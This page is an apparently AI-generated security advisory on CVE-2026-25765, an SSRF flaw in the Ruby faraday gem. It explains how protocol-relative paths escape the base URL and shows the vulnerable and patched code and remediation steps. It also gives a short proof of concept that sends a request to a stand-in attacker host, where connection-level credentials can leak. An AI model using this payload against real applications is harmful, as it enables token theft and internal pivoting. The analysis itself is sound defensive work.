CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-25765

Faraday SSRF: When a Double Slash Becomes a Double Agent

Amit Schendel
Amit Schendel
Senior Security Researcher

Feb 9, 2026·6 min read·73 visits

Executive Summary (TL;DR)

Faraday < 2.14.1 fails to sanitize protocol-relative URLs (e.g., '//attacker.com'). This allows attackers to bypass the intended base URL and force the application to send requests (and potentially sensitive headers) to an external server.

A high-severity Server-Side Request Forgery (SSRF) vulnerability in the popular Ruby 'faraday' gem allows attackers to redirect HTTP requests to arbitrary hosts using protocol-relative URLs. By supplying a path starting with double slashes (//), an attacker can bypass path sanitization logic, causing the library to treat the input as a new network authority rather than a relative path.

The Hook: The Swiss Army Knife That Stabs Back

If you write Ruby, you know Faraday. It’s the de-facto standard HTTP client—the Swiss Army knife that abstracts away the pain of Net::HTTP. You instantiate a connection with a base URL (say, an internal microservice or a banking API), and you trust Faraday to append your endpoints correctly. You assume that if you lock the front door by setting a url_prefix of https://internal-api.corp, no amount of knocking will let someone exit through the back window to https://evil-hacker.com.

But here’s the thing about abstractions: they leak. And in this case, a quirk in how URIs are merged—specifically a feature defined way back in RFC 3986—turned Faraday into a naive accomplice. It turns out that // isn't just a comment in your code; in the world of URIs, it's a trapdoor.

CVE-2026-25765 isn't a complex memory corruption bug or a buffer overflow. It's a logic error born from a misunderstanding of how URL merging works. It’s the digital equivalent of telling a taxi driver "Take me to Main Street," and the driver interpreting that as "Drive to a different country named Main Street."

The Flaw: The Protocol-Relative Poltergeist

To understand this exploit, you have to understand Protocol-Relative URLs (or "network-path references" if you want to sound like an RFC nerd). You've seen them in HTML: <script src="//cdn.com/lib.js">. This tells the browser: "Use whatever protocol (HTTP or HTTPS) we are currently using, but switch the host to cdn.com."

Ruby's standard URI#merge method respects this RFC behavior. If you merge //attacker.com onto https://internal.com, the result is https://attacker.com. The scheme is preserved, but the host (authority) is completely swapped out.

Faraday knows this is dangerous. It has logic specifically designed to handle relative paths so that conn.get('/users') correctly resolves to https://internal.com/users. However, the logic had a blind spot. It tried to distinguish between absolute paths (safe to merge as-is) and relative paths (which needed handling). The check looked something like this:

> "If the input starts with /, assume it's an absolute path and let it pass through raw."

The problem? //attacker.com technically starts with /. So Faraday looked at the double-slash payload, shrugged, said "looks like an absolute path to me," and passed it straight to URI#merge. That assumption was the fatal flaw.

The Code: The Line That Missed

Let's look at the crime scene in lib/faraday/connection.rb. The method build_exclusive_url is responsible for combining the connection's base URL with the request path. Here is the vulnerable code logic prior to version 2.14.1:

# THE VULNERABLE LOGIC
# It tries to prepend './' to force a relative path, UNLESS it looks like a URI or absolute path.
url = "./#{url}" if url.respond_to?(:start_with?) && !url.start_with?('http://', 'https://', '/', './', '../')

Read that condition carefully: !url.start_with?(..., '/'). It explicitly exempts strings starting with a single forward slash /. The developer's intent was to support paths like /api/v1/resource. Unfortunately, in Ruby, '//evil.com'.start_with?('/') returns true.

Because the check passed, the code skipped the ./ sanitization. The url variable remained //evil.com. A few lines later, it executed base + url. When base is https://internal and url is //evil.com, Ruby's URI library discards the internal host entirely.

Here is the fix implemented in commit a6d3a3a0bf59c2ab307d0abd91bc126aef5561bc. They added a specific check for the double slash:

# THE FIX
# Now, if it starts with '//', we force it into the sanitization block.
url = "./#{url}" if url.respond_to?(:start_with?) &&
                    (!url.start_with?('http://', 'https://', '/', './', '../') || url.start_with?('//'))

By forcing //evil.com to become .///evil.com, the URI#merge method treats it as a literal folder named evil.com inside the current host, effectively neutralizing the SSRF.

The Exploit: Hijacking the Request

Exploiting this is trivially easy if you have control over the path passed to a Faraday client. Imagine a Ruby application that proxies images or user content. It sets up a "secure" connection to its backend storage:

# SETUP
conn = Faraday.new(url: 'https://internal-storage.local/v1')
 
# ATTACKER INPUT
# The app expects a filename, like 'profile.jpg'
user_input = "//attacker-controlled.com/loot"
 
# EXECUTION
conn.get(user_input)

The Flow:

  1. Input: //attacker-controlled.com/loot
  2. Faraday Check: Starts with /? Yes. Skip sanitization.
  3. Merge: https://internal-storage.local/v1 + //attacker-controlled.com/loot
  4. Result: https://attacker-controlled.com/loot

The real danger here isn't just hitting an external server. Faraday connections often carry Authorization headers (Bearer tokens, API keys) configured at the connection level. If the application blindly follows this redirect, it will hand over those credentials to the attacker's server. It's a classic "confused deputy" problem.

The Impact: Why Should We Panic?

This vulnerability is a textbook SSRF vector, but the impact depends heavily on the context of the base URL. Because the scheme (HTTP vs HTTPS) is inherited from the base URL, you are somewhat constrained. If the application connects to https://api.stripe.com, your exploit will force a request to https://attacker.com. You cannot downgrade to HTTP to hit local metadata services that don't support TLS (like the AWS IMDSv1 at http://169.254.169.254).

However, the Credential Leakage is the high-stakes risk here. If the Faraday connection is initialized with a shared secret or an OAuth token intended for an internal microservice, that token is now in your access logs.

Furthermore, if the application is part of a service mesh or an intranet where internal services use HTTPS with self-signed certs (or valid internal PKI), an attacker can pivot to scan internal ports or interact with other internal APIs, bypassing firewall rules that trust the vulnerable application server.

The Fix: Closing the Window

The remediation is straightforward: Update Faraday. Version 2.14.1 patches this specific bypass.

If you cannot update immediately, you must sanitize input before passing it to Faraday. Do not rely on Faraday to fix your paths. Explicitly reject any input starting with // or use Ruby's URI.parse to validate that the input contains only a path and no authority component.

> [!NOTE] > Security isn't just about patching libraries; it's about input validation. If your application expects a filename, validate that it matches ^[a-zA-Z0-9_.-]+$. Don't let users type raw paths.

Official Patches

FaradayCommit fixing the SSRF vulnerability

Fix Analysis (1)

Technical Appendix

CVSS Score
5.8/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
EPSS Probability
0.12%
Top 100% most exploited

Affected Systems

Ruby on Rails applications using FaradayRuby microservicesAny Ruby application proxying requests via Faraday

Affected Versions Detail

Product
Affected Versions
Fixed Version
faraday
lostisland
< 2.14.12.14.1
AttributeDetail
CWECWE-918 (Server-Side Request Forgery)
CVSS v3.15.8 (Medium)
Attack VectorNetwork (Remote)
Privileges RequiredNone
ImpactConfidentiality (Header Leakage)
Exploit StatusPoC Available

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1557Adversary-in-the-Middle
Credential Access
CWE-918
Server-Side Request Forgery (SSRF)

The software does not correctly neutralize user-controllable input within a URL/URI, allowing the server to make a connection to an unintended destination.

Known Exploits & Detection

GitHub Security AdvisoryAdvisory containing reproduction steps and root cause analysis.
NucleiDetection Template Available

Vulnerability Timeline

Fix committed to master branch
2026-02-07
GHSA Advisory Published
2026-02-09
CVE-2026-25765 Assigned
2026-02-09

References & Sources

  • [1]GHSA Advisory
  • [2]RFC 3986 - Relative Reference

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•12 minutes ago•CVE-2026-52778
9.8

CVE-2026-52778: Unauthenticated Remote Code Execution and ReDoS in YesWiki Bazar Formula Calculator

An unsafe execution vulnerability exists in the Bazar form field calculator (CalcField.php) of YesWiki prior to version 4.6.6. The application attempts to validate mathematical formulas using a complex recursive regular expression before passing them to the PHP eval() function. This design leads to both Regular Expression Denial of Service (ReDoS) and Remote Code Execution (RCE) via validation bypass.

Alon Barad
Alon Barad
1 views•7 min read
•43 minutes ago•CVE-2026-54651
5.5

CVE-2026-54651: Infinite Loop Vulnerability in pypdf Article Thread Parser

An infinite loop vulnerability exists in the pure-Python PDF library pypdf prior to version 6.13.1. When parsing or merging a crafted PDF file containing a cyclic Article/Thread structure, the library fails to exit its traversal loop. This causes the executing thread to hang indefinitely, leading to 100% CPU utilization and a denial of service. The vulnerability is tracked under CVE-2026-54651 and GHSA-g9xf-7f8q-9mcj, with a CVSS base score of 5.5. This technical report provides a root cause analysis, code review, exploitation vectors, and mitigation paths.

Alon Barad
Alon Barad
5 views•7 min read
•about 5 hours ago•GHSA-387M-935M-C4VW
7.5

GHSA-387m-935m-c4vw: Unbounded HTTP Redirections Enable Infinite Loop Denial of Service in Micronaut HTTP Client

The Netty-based HTTP Client in the Micronaut framework fails to enforce a maximum redirect ceiling by default when processing HTTP responses. This permits remote, attacker-controlled servers to trigger continuous, infinite redirect loops. The resulting recursion causes high CPU utilization, thread starvation, and potential memory exhaustion, inducing a Denial of Service (DoS) state in client-side applications.

Amit Schendel
Amit Schendel
5 views•6 min read
•about 6 hours ago•GHSA-Q6GH-6V2R-HJV3
8.8

GHSA-Q6GH-6V2R-HJV3: Cross-Origin Credential Leakage in Micronaut HTTP Client

An information disclosure vulnerability exists in the Micronaut Framework's HTTP client components. The client fails to clear sensitive authorization headers and cookies when following redirects across different origins. If an application using the vulnerable client communicates with an endpoint that issues a redirect to an external host, the client will forward the original credentials, leading to potential token theft and session hijacking.

Amit Schendel
Amit Schendel
5 views•6 min read
•about 6 hours ago•GHSA-52VM-MXX8-F227
7.7

GHSA-52vm-mxx8-f227: Arbitrary File Write and Decompression Denial of Service in phantom-audio

GHSA-52vm-mxx8-f227 is a dual-vector security flaw in phantom-audio (<= 1.3.0). The vulnerability allows arbitrary file writes due to unconfined Model Context Protocol (MCP) tool paths when the PHANTOM_OUTPUT_DIR environment variable is not defined. Concurrently, the platform lacks validation controls during the decompression of highly compressed audio files, resulting in resource-exhaustion denial of service and downstream parsing vulnerability exposure.

Amit Schendel
Amit Schendel
5 views•5 min read
•about 7 hours ago•GHSA-C43V-4CR8-6MVP
6.5

GHSA-C43V-4CR8-6MVP: Authenticated Path Traversal in Craft CMS Asset Icon Helper

An authenticated path traversal and arbitrary local file read vulnerability exists in Craft CMS versions 4.x up to 4.17.6 within the assets/icon endpoint and Assets helper classes. By exploiting this vulnerability, an authenticated user can traverse directories and read arbitrary .svg files on the server's filesystem, or execute Stored Cross-Site Scripting (XSS) if they can upload a malicious SVG.

Alon Barad
Alon Barad
4 views•8 min read